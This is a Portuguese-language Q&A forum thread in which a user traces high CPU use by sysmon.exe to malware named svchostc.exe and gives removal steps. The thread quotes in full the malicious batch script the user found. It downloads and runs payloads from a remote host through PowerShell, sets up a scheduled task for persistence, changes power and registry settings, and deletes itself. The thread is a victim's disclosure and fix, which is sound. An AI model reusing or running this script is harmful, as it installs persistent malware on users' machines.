O SYSMON.EXE está consumindo quase metade da CPU. É vírus? // RESOLVIDO

1

Isso aconteceu após a instalação do Visual Studio 2017. Pesquisou em todos os lugares e sem sucesso aqui estou.

Captura de tela do Gerenciador de tarefas

Captura de tela - Localização do SYSMON.EXE no TEMP

A origem do SYSMON.EXE na pasta Visual Studio

No Gerenciador de tarefas, quando visito o local. Leva para a pasta TEMP e o tamanho total é de cerca de 170 MB. Não sei se é legítimo ou não.

Ele diz neste link da Microsoft: é legítimo, mas ainda assim, não usei nenhuma linha de comando para instalá-lo. Além disso, ele não está dentro da pasta oficial do Windows - mas dentro da temperatura.

E mesmo se você terminar o processo, ele aparecerá automaticamente depois de um tempo.

Atualização: O processo de matar e excluir os arquivos temporários não está funcionando. Mesmo desinstalando arquivos inteiros do Visual Studio (20 + GB), o problema ainda persiste. Eu preciso de ajuda. Por favor!

// RESOLVIDO //

Estou mantendo o fio no caso de alguém enfrentar o mesmo problema

  • Encontre svchostc.exe (não svchost.exe) no gerenciador de tarefas e exclua-o do local original.
  • Além disso, limpe o registro e exclua arquivos temporários de% temp%

O svchostc.exe executou os seguintes arquivos bat e baixou os arquivos de vírus na pasta temp e tudo é histórico.

Atualização: isso estava dentro de um arquivo bat.

ping www.google.com -n 1 -w 1000 if %errorlevel% == 1 ( exit ) if not exist "%TEMP%\7za.exe" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/7za.exe -OutFile \"%TEMP%\7za.exe\"" ) if not exist "%TEMP%\ppuarchive4.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\"" ) if not exist "%TEMP%\bcmuarchive12.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\"" ) if not exist "%TEMP%\tmg.ps1" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\"" ) if not exist "%TEMP%\opokl.txt" ( PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\"" PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\"" schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F del "%TEMP%\svctask.xml" echo a > "%TEMP%\opokl.txt" ) if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchbot.vbs -OutFile \"%TEMP%\batchbot.vbs\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\"" "%TEMP%\batchinstaller.bat" ) set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1 1D8C5463FF555789B3706E4571DD6C512B427A9F 5F72F3EFCF42EAAC871C919FA5C85C1C11FB7F6A (for %%a in (%list%) do ( powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90 )) powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" ( "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y "%~dp0\packagenew\buildpassive.bat" echo d > "%LOCALAPPDATA%\svc10.17134\d.txt" rmdir /s /q "%~dp0\packagenew" ) ::taskkill /f /im sysmon.exe tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL if "%ERRORLEVEL%"=="0" exit "%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y "%~dp0\packagehwloc\start.bat" start /b "" cmd /c del "%~dp0\upd.bat"&exit /b

windows-10 task-manager Min Somai
fonte
Se você estiver preocupado, interrompa manualmente o processo e limpe sua pasta temporária.
Ramhound 30/08/19
Edite a pergunta para limitá-la a um problema específico com detalhes suficientes para identificar uma resposta adequada.
Ramhound 30/08/19
@ Ramhound, fez isso muitas e muitas vezes - novamente enche a pasta com os mesmos arquivos.
Min Somai
E existe alguma maneira de saber a origem dos arquivos na pasta temp?
Min Somai
11
Esse problema começou a ocorrer após a instalação do Visual Studio. Então, se você desinstalar o Visual Studio, o problema desaparece?
Ramhound 30/08/19